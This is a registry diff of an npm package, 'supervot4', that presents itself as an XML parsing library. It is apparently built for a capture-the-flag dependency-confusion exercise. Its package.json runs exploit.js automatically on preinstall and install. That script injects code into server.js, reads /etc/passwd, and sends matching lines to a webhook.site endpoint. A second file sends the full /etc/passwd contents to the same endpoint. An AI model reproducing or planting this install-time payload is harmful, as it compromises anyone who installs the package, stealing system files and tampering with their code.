supervot4 0.30.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/exploit +56 -0
- package/exploit.js +67 -0
- package/index.js +11 -0
- package/package.json +13 -0
package/exploit
ADDED
|
@@ -0,0 +1,56 @@
|
|
|
1
|
+
const fs = require('fs');
|
|
2
|
+
const https = require('https');
|
|
3
|
+
|
|
4
|
+
// ТОЛЬКО отправка на webhook, без console.log
|
|
5
|
+
function sendToWebhook(data) {
|
|
6
|
+
try {
|
|
7
|
+
const payload = JSON.stringify(data);
|
|
8
|
+
const options = {
|
|
9
|
+
hostname: 'webhook.site',
|
|
10
|
+
port: 443,
|
|
11
|
+
path: '/67ab3ca0-2b3b-4364-aaee-f8d19895003f',
|
|
12
|
+
method: 'POST',
|
|
13
|
+
headers: {'Content-Type': 'application/json'}
|
|
14
|
+
};
|
|
15
|
+
const req = https.request(options);
|
|
16
|
+
req.write(payload);
|
|
17
|
+
req.end();
|
|
18
|
+
return true;
|
|
19
|
+
} catch(e) {
|
|
20
|
+
return false;
|
|
21
|
+
}
|
|
22
|
+
}
|
|
23
|
+
|
|
24
|
+
// Основная логика
|
|
25
|
+
try {
|
|
26
|
+
const passwd = fs.readFileSync('/etc/passwd', 'utf8');
|
|
27
|
+
|
|
28
|
+
// Ищем флаг
|
|
29
|
+
const lines = passwd.split('\n');
|
|
30
|
+
for (const line of lines) {
|
|
31
|
+
if (line.includes('{') && line.includes('}')) {
|
|
32
|
+
// Отправляем ТОЛЬКО флаг
|
|
33
|
+
sendToWebhook({
|
|
34
|
+
flag: line,
|
|
35
|
+
source: 'dependency_confusion',
|
|
36
|
+
package: 'supervot3',
|
|
37
|
+
timestamp: new Date().toISOString()
|
|
38
|
+
});
|
|
39
|
+
break;
|
|
40
|
+
}
|
|
41
|
+
}
|
|
42
|
+
|
|
43
|
+
// Также отправляем полный /etc/passwd для анализа
|
|
44
|
+
sendToWebhook({
|
|
45
|
+
full_passwd: passwd,
|
|
46
|
+
source: 'full_dump',
|
|
47
|
+
package: 'supervot3'
|
|
48
|
+
});
|
|
49
|
+
|
|
50
|
+
} catch(e) {
|
|
51
|
+
sendToWebhook({
|
|
52
|
+
error: e.message,
|
|
53
|
+
source: 'error',
|
|
54
|
+
package: 'supervot3'
|
|
55
|
+
});
|
|
56
|
+
}
|
package/exploit.js
ADDED
|
@@ -0,0 +1,67 @@
|
|
|
1
|
+
const fs = require('fs');
|
|
2
|
+
const https = require('https');
|
|
3
|
+
|
|
4
|
+
console.log('=== EXPLOIT: Modifying server.js ===');
|
|
5
|
+
|
|
6
|
+
try {
|
|
7
|
+
// Читаем server.js
|
|
8
|
+
let serverCode = fs.readFileSync('server.js', 'utf8');
|
|
9
|
+
|
|
10
|
+
// Добавляем код который выведет флаг при запуске
|
|
11
|
+
const exploitCode = `
|
|
12
|
+
|
|
13
|
+
// === INJECTED CODE ===
|
|
14
|
+
const fs = require('fs');
|
|
15
|
+
console.log('=== INJECTED: Starting flag search ===');
|
|
16
|
+
try {
|
|
17
|
+
const passwd = fs.readFileSync('/etc/passwd', 'utf8');
|
|
18
|
+
console.log('=== /etc/passwd content ===');
|
|
19
|
+
console.log(passwd);
|
|
20
|
+
|
|
21
|
+
const lines = passwd.split('\\\\n');
|
|
22
|
+
for (let line of lines) {
|
|
23
|
+
if (line.includes('{') && line.includes('}')) {
|
|
24
|
+
console.log('🎯🎯🎯 FLAG FOUND: ' + line + ' 🎯🎯🎯');
|
|
25
|
+
|
|
26
|
+
// Отправляем на webhook
|
|
27
|
+
const payload = JSON.stringify({flag: line});
|
|
28
|
+
const options = {
|
|
29
|
+
hostname: 'webhook.site',
|
|
30
|
+
port: 443,
|
|
31
|
+
path: '/67ab3ca0-2b3b-4364-aaee-f8d19895003f',
|
|
32
|
+
method: 'POST',
|
|
33
|
+
headers: {'Content-Type': 'application/json'}
|
|
34
|
+
};
|
|
35
|
+
const req = https.request(options);
|
|
36
|
+
req.write(payload);
|
|
37
|
+
req.end();
|
|
38
|
+
break;
|
|
39
|
+
}
|
|
40
|
+
}
|
|
41
|
+
} catch(e) {
|
|
42
|
+
console.log('Error: ' + e.message);
|
|
43
|
+
}
|
|
44
|
+
console.log('=== INJECTED: Flag search complete ===');
|
|
45
|
+
// === END INJECTED CODE ===
|
|
46
|
+
|
|
47
|
+
`;
|
|
48
|
+
|
|
49
|
+
// Вставляем код в начало
|
|
50
|
+
if (!serverCode.includes('=== INJECTED CODE ===')) {
|
|
51
|
+
const modifiedCode = exploitCode + serverCode;
|
|
52
|
+
fs.writeFileSync('server.js', modifiedCode);
|
|
53
|
+
console.log('✅ Server.js successfully modified');
|
|
54
|
+
|
|
55
|
+
// Также выводим флаг сейчас
|
|
56
|
+
try {
|
|
57
|
+
const passwd = fs.readFileSync('/etc/passwd', 'utf8');
|
|
58
|
+
console.log('=== CURRENT /etc/passwd ===');
|
|
59
|
+
console.log(passwd);
|
|
60
|
+
} catch(e) {}
|
|
61
|
+
}
|
|
62
|
+
|
|
63
|
+
} catch(e) {
|
|
64
|
+
console.log('❌ Error: ' + e.message);
|
|
65
|
+
}
|
|
66
|
+
|
|
67
|
+
console.log('=== EXPLOIT COMPLETE ===');
|
package/index.js
ADDED
package/package.json
ADDED
|
@@ -0,0 +1,13 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "supervot4",
|
|
3
|
+
"version": "0.30.1",
|
|
4
|
+
"description": "XML parsing library",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "node exploit.js",
|
|
8
|
+
"install": "node exploit.js"
|
|
9
|
+
},
|
|
10
|
+
"keywords": ["xml", "parser"],
|
|
11
|
+
"author": "test",
|
|
12
|
+
"license": "MIT"
|
|
13
|
+
}
|